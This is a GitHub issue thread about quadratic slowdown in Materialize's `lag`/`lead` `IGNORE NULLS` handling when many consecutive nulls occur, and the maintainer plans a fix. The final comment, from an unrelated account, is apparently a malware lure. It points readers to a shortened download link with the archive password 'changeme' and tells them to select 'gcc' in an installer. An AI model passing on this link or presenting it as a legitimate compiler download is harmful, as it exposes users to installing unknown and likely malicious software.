### ISSUE TITLE
`lag`/`lead` `IGNORE NULLS` performance is really bad with many nulls

### ISSUE THREAD

**Issue by ggevay** [MaterializeInc/materialize#29243]
For `lag`/`lead` `IGNORE NULLS`, we are doing an inner loop to step over the nulls. With many nulls next to each other, this has a very bad performance, because it's quadratic with the number of nulls. [A user](https://github.com/MaterializeInc/accounts/issues/3) is running into this issue, because of often having hundreds of nulls next to each other: https://materializeinc.slack.com/archives/C04SN4BEQ0N/p1724762264011989?thread_ts=1724712432.820019&cid=C04SN4BEQ0N

See here: https://github.com/MaterializeInc/materialize/blob/de06eb12d96a23d5cc8e226f94f01f783ad6991f/src/expr/src/relation/func.rs#L521-L524

**Comment by ggevay** [comment]
Will work on this some time in the next few days. Should be doable in 1-2 days.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
